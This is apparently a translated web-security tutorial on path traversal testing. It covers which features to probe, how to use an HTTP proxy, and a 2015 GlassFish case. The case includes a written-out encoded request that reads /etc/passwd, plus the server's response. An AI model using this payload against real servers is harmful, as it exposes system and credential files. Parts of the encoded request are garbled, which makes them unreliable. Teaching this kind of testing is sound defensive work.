Pathtraversal vulnerability ised to see if a web application allows unauthorized access to files or directories that should be denied access. This type of attack uses parameters passed to the application that show the paths to the resources on which specific operations are performed, such as reading, writing, or displaying the contents of the directory. As a result, this can lead to the disclosure of redundant information, configuration files, and even the ability to execute code remotely. Path traversal vulnerability can occur in different elements of the software or its functions. There is no place to skip during testing, but there are features to pay special attention to:
- Features responsible for downloading files from the server
- features responsible for loading application settings (templates, styles, interface language),
- functions responsible for uploading files to the server.
Forpath traversal vulnerability testing,you can use HTTPproxies e.g. Burp Suite Proxy. You can use it to manipulate the parameters that represent the path by adding the appropriate strings, such as the parameters of the path. ".. /", aimed at "jumping out" from the currently processed directory. An example in the following graphic:
Another example of path traversal vulnerability could be an August 2015 bug found on the GlassFish application server. Calling the appropriate request, as shown below, allowed any file to be read from disk:
GET /theme/%c0%ae%c0%ae%c0%af%c0%ae%c0%c0%af%c0%c0%c0%ae%c0%af% c 0%ae%c0%ae%c0%af%c0%ae%c0%c0%af%c0%ae%c0%c0%c0%af%c0%ae%ae%c0%ae% c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%c0%af%c0%ae%c0%ae%ae %c0%afetc%c0%afpasswd
HTTP/1.1
Host: 127.0.0.1:4848
Accept: */*
Accept-Language: en
Connection: close
In response, the server returns the contents of the /etc/passwd file:
HTTP/1.1 200 OK
Server: GlassFish Server Open Source Edition 4.1
X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1
Java/Oracle Corporation/1.7)
Last-Modified: Tue, 13 Jan 2015 10:00:00 GMT
Date: Tue, 10 Jan 2015 10:00:00 GMT
Connection: close
Content-Length: 1087
root:!:16436:0:99999:7:::
daemon:*:16273:0:99999:7:::
bin:*:16273:0:99999:7:::
sys:*:16273:0:99999:7:::
sync:*:16273:0:99999:7:::
[...]
